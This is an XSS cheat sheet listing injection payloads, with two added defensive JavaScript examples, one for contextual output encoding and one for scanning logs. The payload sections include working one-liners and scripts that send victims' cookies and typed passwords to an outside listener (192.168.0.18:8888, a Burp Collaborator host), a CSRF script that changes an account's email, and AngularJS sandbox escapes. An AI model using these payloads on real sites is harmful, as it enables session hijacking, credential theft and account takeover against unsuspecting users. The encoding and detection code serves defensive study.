Cross Site Scripting (XSS)
Examples:
<img src=1 onerror=alert(1)>
"><svg onload=alert(1)>
'"><img src=1 onerror=alert(1)>a'a\'b"c>%3f>%25%7d%7d%25%25>c<[[%3f$%7b%7b%25%7d%7dcake\
<iframe src="https://URL/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
bgz1k"onfocus="alert(1)"autofocus="o7t2y
javascript:alert(1)
'-alert(1)-' # breaks out of a single-quoted JS string
\"-alert(1)}// # DOM breakout
<><img src=1 onerror=alert(1)><img src=x onerror=this.src='http://192.168.0.18:8888/?'+document.cookie;>
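The payloads above each abuse one rendering context (element content, an unquoted attribute, a JS string literal, an href). The defence is output encoding chosen per context, plus scheme allow-listing for URLs, since no encoding makes `javascript:` safe. The following is an added example, not code from the original cheat sheet; the `renderComment` template and the `https://example.invalid/` base URL are assumptions made for the demonstration.

```javascript
// Added example: contextual output encoding for the contexts the payloads
// above target. Not part of the original cheat sheet.

// Element content and quoted attribute values: encode the five characters
// that can close a tag, close an attribute, or start an entity.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Unquoted attribute values (what the ..."onfocus="alert(1)"autofocus=...
// payload relies on): encode everything that is not alphanumeric, so a space
// or quote in the data can never start a new attribute.
function escapeAttrUnquoted(untrusted) {
  return String(untrusted).replace(/[^A-Za-z0-9]/gu,
    (c) => `&#x${c.codePointAt(0).toString(16)};`);
}

// JavaScript string literal context ('-alert(1)-' and \"-alert(1)}//):
// JSON.stringify escapes quotes and backslashes, but </script> and the
// U+2028/U+2029 line terminators still break out, so they are escaped too.
function escapeJsString(untrusted) {
  return JSON.stringify(String(untrusted))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// href context (javascript:alert(1)): the scheme itself is the payload, so
// parse with the URL parser (which also strips embedded tabs/newlines) and
// allow-list the scheme. The base URL is an assumption for this example.
function safeHref(untrusted) {
  let url;
  try {
    url = new URL(String(untrusted).trim(), 'https://example.invalid/');
  } catch {
    return '#';
  }
  return (url.protocol === 'http:' || url.protocol === 'https:') ? url.href : '#';
}

// Hypothetical template that places one untrusted value in each context.
function renderComment(name, comment, site) {
  return `<div class="comment" data-user=${escapeAttrUnquoted(name)}>` +
    `<a href="${escapeHtml(safeHref(site))}">${escapeHtml(name)}</a>` +
    `<p>${escapeHtml(comment)}</p>` +
    `<script>var author = ${escapeJsString(name)};</script></div>`;
}

// Feed the cheat sheet's own payloads through the template.
console.log(renderComment(
  'bgz1k"onfocus="alert(1)"autofocus="o7t2y',
  '<img src=1 onerror=alert(1)>',
  'javascript:alert(1)'));
```

Note that a single "sanitize everything" function cannot cover these cases: HTML-entity encoding does nothing inside a JS string, and neither encoding helps in an href. The encoder has to be picked by where the data lands.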
Remotely steal cookies:
one-liner:
<img src=x onerror=this.src='http://192.168.0.18:8888/?'+document.cookie;>
script:
<script>
  fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
    method: 'POST',
    mode: 'no-cors',
    body: document.cookie
  });
</script>
Remotely steal passwords:
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
  method: 'POST',
  mode: 'no-cors',
  body: username.value+':'+this.value
});">
CSRF / XSS:
<script>
  var req = new XMLHttpRequest();
  req.onload = handleResponse;
  req.open('get', '/my-account', true);
  req.send();
  function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf=' + token + '&email=test@test.com');
  };
</script>
AngularJS < 1.6:
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
{{1+1
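On the detection side, every payload family on this page (tags, event-handler attributes, the `javascript:` scheme, the `{{` template sigil) has a recognisable shape, but only after the parameter has been fully decoded; the `%3f`/`%25%7d%7d` fragments above show why a single decoding pass is not enough. The following is an added example, not code from the original cheat sheet: the access-log format and the log lines are constructed, and the rule set is a starting point rather than a complete signature list (for rendering, allow-listing as in output encoding is still the control that matters).

```javascript
// Added example: scan constructed access-log lines for the payload shapes
// listed on this page. Log lines and format are constructed, not real traffic.
const LOG_LINES = [
  '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?q=cake HTTP/1.1" 200',
  '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=%3Cimg%20src%3D1%20onerror%3Dalert(1)%3E HTTP/1.1" 200',
  '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /profile?site=JavaScript%3Aalert(1) HTTP/1.1" 200',
  '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /page?name=%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D HTTP/1.1" 200',
  // double-encoded: one decode yields %22%3E%3Csvg..., a second yields the tag
  '10.0.0.4 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=%2522%253E%253Csvg%2520onload%253Dalert(1)%253E HTTP/1.1" 200',
];

// One rule per payload family shown on this page.
const RULES = [
  { name: 'html-tag',      re: /<\/?[a-z][^>]*>/i },          // <img ...>, <svg ...>
  { name: 'event-handler', re: /\bon[a-z]+\s*=/i },           // onerror=, onload=, onfocus=
  { name: 'script-scheme', re: /^\s*javascript\s*:/i },       // javascript:alert(1)
  { name: 'template-expr', re: /\{\{/ },                      // AngularJS {{ ... }}
];

// Decode repeatedly (bounded) so double-encoded input reaches the same form
// the browser would render; strip the whitespace characters browsers ignore
// inside URLs so "java\tscript:" does not evade the scheme rule.
function normalize(value) {
  let current = String(value);
  for (let i = 0; i < 3; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current.replace(/\+/g, ' '));
    } catch {
      break; // malformed %-sequence: stop decoding, keep what we have
    }
    if (decoded === current) break;
    current = decoded;
  }
  return current.replace(/[\t\n\r]/g, '');
}

// Pull the request target out of a combined-format line and test each
// query parameter against the rules. The base URL is a parsing placeholder.
function scanLine(line) {
  const m = line.match(/"(?:GET|POST|PUT) (\S+) HTTP\/[\d.]+"/);
  if (!m) return [];
  const url = new URL(m[1], 'http://log.invalid');
  const hits = [];
  for (const [key, value] of url.searchParams) {
    const v = normalize(value);
    for (const rule of RULES) {
      if (rule.re.test(v)) hits.push({ param: key, rule: rule.name });
    }
  }
  return hits;
}

// Returns only the lines that triggered at least one rule, with 1-based line numbers.
function scanLog(lines) {
  return lines
    .map((line, i) => ({ line: i + 1, hits: scanLine(line) }))
    .filter((r) => r.hits.length > 0);
}

console.log(JSON.stringify(scanLog(LOG_LINES), null, 2));
```

Expect a non-trivial false-positive rate from a rule set this small (any parameter that legitimately carries HTML will trip `html-tag`); the point is to alert on the decoded form, not on the raw query string.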